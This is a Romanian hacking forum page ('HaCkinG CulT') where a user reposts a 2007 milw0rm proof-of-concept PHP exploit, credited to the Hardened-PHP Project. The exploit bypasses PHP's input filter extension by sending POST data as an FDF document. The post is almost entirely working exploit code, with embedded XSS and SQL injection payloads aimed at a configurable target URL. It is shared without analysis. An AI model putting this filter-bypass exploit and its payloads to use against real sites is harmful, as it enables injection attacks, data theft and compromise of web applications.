Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie: Nebunyka pe Simpatie
| Femeie 21 ani Bacau cauta Barbat 21 - 52 ani |
|
Zero_Cool
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 796
|
|
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // ////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE");
// _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT ";
$url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf"); unlink("outtest.fdf"); $params = array('http' => array( 'method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf' )); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open $url"); } $response = @stream_get_contents($fp);
echo $response; echo "n"; ?>
# milw0rm.com [2007-03-10]
Modificat de Shocker (acum 17 ani)
|
|
pus acum 17 ani |
|